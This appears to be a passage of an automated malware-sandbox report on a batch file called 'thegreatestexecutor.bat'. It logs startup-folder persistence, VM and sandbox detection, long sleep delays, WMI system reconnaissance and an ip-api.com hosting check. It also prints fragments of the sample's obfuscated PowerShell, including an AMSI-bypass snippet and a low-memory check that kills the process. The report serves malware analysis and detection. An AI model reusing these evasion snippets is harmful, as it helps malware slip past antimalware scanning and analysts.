      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: thegreatestexecutor.bat | Static file information: File size 3533346 > 1048576
      Source: Binary string: winload_prod.pdbacroNGLLog.txt source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\acrobat_sbx source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: powershell.exe, 00000022.00000002.1801242655.000000C00007A000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: powershell.exe, 00000022.00000002.1801242655.000000C000014000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdbL source: powershell.exe, 0000001F.00000002.1681630492.000002B3D8001000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ntkrnlmp.pdb source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdb source: powershell.exe, 0000001F.00000002.1614835648.000002B3C127F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdbhP source: powershell.exe, 0000001F.00000002.1614835648.000002B3C127F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly($name, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $module = $assembly.DefineDynamicModule('DynamicModule') $typeBuilder = $module.DefineType('PInvokeType', 'Publi
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String("JGtlbWF0aWFuLlNldFZhbHVlKCRudWxsLCR0cnVlKQ==")) | &([regex]::Unescape("\u0069\u0065\u0078")) ([Reflection.Assembly]::LoadWithPartialName(('System.Core')).GetType(('System.Diagnost
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFAAC62794A push ebx; retf 12_2_00007FFAAC62796A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_00007FFAAC5000BD pushad ; iretd 31_2_00007FFAAC5000C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FFAAC5100BD pushad ; iretd 34_2_00007FFAAC5100C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FFAAC519B90 push eax; retf 34_2_00007FFAAC519B99
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FFAAC51407E push eax; iretd 34_2_00007FFAAC51408D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_00007FFAAC51406A pushad ; iretd 34_2_00007FFAAC51407D
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll

      Boot Survival

      Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat
      Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat\:Zone.Identifier:$DATA

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ip-api.com Connection: Keep-Alive
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Service
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDisk
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_StartupCommand
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 34_2_000001DF1D324F20 rdtscp 34_2_000001DF1D324F20
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5817
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3947
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1367
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 481
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2269
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1909
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6769
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2831
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5874
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3850
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4630
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5157
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452 | Thread sleep count: 5817 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452 | Thread sleep count: 3947 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 | Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436 | Thread sleep count: 1367 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424 | Thread sleep count: 481 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 | Thread sleep count: 2269 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 | Thread sleep count: 1909 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552 | Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920 | Thread sleep time: -14757395258967632s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7812 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672 | Thread sleep time: -11068046444225724s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2168 | Thread sleep count: 4630 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324 | Thread sleep time: -20291418481080494s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332 | Thread sleep count: 5157 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312 | Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystemProduct
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: svchost.exe, 0000001B.00000002.2535921491.0000023F4B02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 0000001B.00000002.2542168207.0000023F50655000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 0000000C.00000002.1364598348.0000020A6E270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM^
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57CAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: netsh.exe, 0000001E.00000003.1552969251.000001A3B3E87000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001E.00000002.1553751077.000001A3B3E8A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1684520069.000002B3D8238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_000001DF1D324F20 rdtscp 34_2_000001DF1D324F20
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match File source: amsi64_7696.amsi.csv, type: OTHER
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
